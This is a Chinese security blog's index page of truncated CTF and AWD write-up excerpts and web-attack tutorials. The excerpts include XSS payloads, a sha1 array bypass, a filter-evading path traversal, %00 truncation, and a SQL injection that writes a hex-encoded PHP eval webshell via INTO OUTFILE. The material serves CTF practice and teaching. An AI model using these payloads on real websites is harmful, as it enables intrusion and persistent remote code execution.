sky's blog

sky's blog

一叶飘零 @ whitzard / r3kapig

江苏第六届省赛线下AWD感触
比赛过程上午场上午给了我们2台服务器,分别是一台Linux和一台windowslinux开了2个服务,一个是80端口的php网页,一个是18888端口的疑似pwn服务windows开了4个服务,80端口的展示页面(应该没用),88端口的jsp服务,89端口的php服务,445端口的smb服务我们进入比赛后:首先登入了linux服务器,修改了密码,备份了文件,在php服务中,只找到一个获取shell的点,然后果断注释了一波。这里也是我们上午收分的关键点,有大概4-5支队伍,刚开始并没有及时注释,被我们拿了一波分数,放了一波表哥的框架shell,但是听说这次crontab没有开启?而且目录没...
2017 BDCTF第一轮初赛web题解
前记垃圾比赛,我再也不会打第二次了!!!!(除非下次web很有趣) web签到题直接就给了源码,是个很老的套路,sha1的数组漏洞绕过构造?id=bdctf&user[]=1,post上pass[]=2就可以轻松绕过 这不仅仅是web图片里有提示,查看源代码,有一行白色的字:文件是文本格式图片里的提示:1234567891: < ZWAXGLDUBVIQHKYJPNTCRMOSFE >2: < KPBELFAOZDTRXMJQCYHGVSNUWI >3: < BDMAZIVRNSJUWFHTOQGYXPLECK >4: < RPLNDEH...
ss和kali源遇到的bug记录
ss的bug今天更新了一波后,再搭SS就报错了,报错信息:1234567891011121314151617181920212223242526INFO: loading config from ss.json 2016-12-14 22:47:50 INFO loading libcrypto from libcrypto.so.1.1 Traceback (most recent call last): File “/usr/local/bin/sslocal”, line 11, in sys.exit(main()) File “/usr/local/lib/...
安恒秋季线下赛决赛wp
前言这里我特么不得不吐槽一波XDCTF,20号才特么告诉我,某大期间不准线下赛???搞得我安恒也没去(为什么安恒可以线下赛???)血亏啊血亏啊!!!!! 绑定host一开始以为是改hosts文件,后来发现抓包改HOST头即可:123456789GET /index.php HTTP/1.1Host: www.mooctest.netCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, li...
安恒杯Web安全测试赛秋季赛部分wp
噗噗T1访问http://118.178.18.181:57016/index.pl?file=index.pl即可看到flag:flag{flag1_song_ni_le} 信息收集直接敲命令nslookup12345678root@sky:~# nslookup 107.182.177.34Server: 192.168.130.2Address: 192.168.130.2#53Non-authoritative answer:34.177.182.107.in-addr.arpa name = this-is-flag.Authoritative answers can be ...
安恒秋季测试赛web部分wp
babywaf首先抓包,然后在file中测试:12345file = test.txt(正常回显)file = te.st.txt(错误回显)file = te..st.txt(正常回显)file = te/st.txt(错误回显)file = te<st.txt(正常回显) 容易发现,..,<都被过滤了,根据题目提示:flag在/flag所以可以轻松构造payload:file=.<./.<./.<./.<./.<./flag通过<过滤的特点,轻松返回上级目录(主要原因是只过滤了一次,造成了这种问题)最后得到flag:flag{To0_y...
XSS挑战之旅-bugku
前记题目网址:http://120.24.86.145:8002/test/做题浏览器:火狐 level-1payload:1<script>alert(1)</script> level-2payload:1"><script>alert(1)</script> level-3payload:1' onmouseover='alert(1) level-4payload:1" onmouseover="alert(1) level-5payload:1"><a ...
过气的00截断
前记为什么说%00过气了呢……因为需要满足以下条件: php版本小于5.3.4 php的magic_quotes_gpc为OFF状态 %00截断原理截断的核心,就是chr(0)这个字符先说一下这个字符,这个字符不为空(Null),也不是空字符(“”),更不是空格。当程序在输出含有chr(0)变量时chr(0)后面的数据会被停止,换句话说,就是误把它当成结束符,后面的数据直接忽略,这就导致漏洞产生 一些应用读文件12345<?php$file = $_GET['file'].'PNG';$contents = file_get_contents($file);file_put_...
有趣的.htaccess
.htaccess功能开启条件 mod_rewrite模块开启 AllowOverride All .htaccess功能开启方法在apache下http.conf改配置: 将工作目录下的AllowOverride None 改为AllowOverride All。 开启.mod_rewrite模块。将#LoadModule rewrite_module modules/mod_rewrite.so前的#去掉即可 .htaccess注意点.htaccess文件中的配置指令作用于.htaccess文件所在的目录及其所有子目录,但是很重要的、需要注意的是,其上级目录也可能会有.ht...
sql注入—into outfile、load_file()
前言两种方式都具有很大局限性,作为了解使用 into outfile1:要知道网站绝对路径,可以通过报错,phpinfo界面,404界面等一些方式知道 2:要有file权限,默认情况下只有root有 3:对目录要有写权限,一般image之类的存放突破的目录就有 如果存在以上条件,还可以注入,那么就可以用into outfile写文件例如:http://127.0.0.1/index.php?age=-1 union select 1,2,3,4,0x3c3f706870206576616c28245f504f53545b27736b79275d293f3e into outfile ‘H...
avatar
一叶飘零
苟有恒,何必三更眠五更起。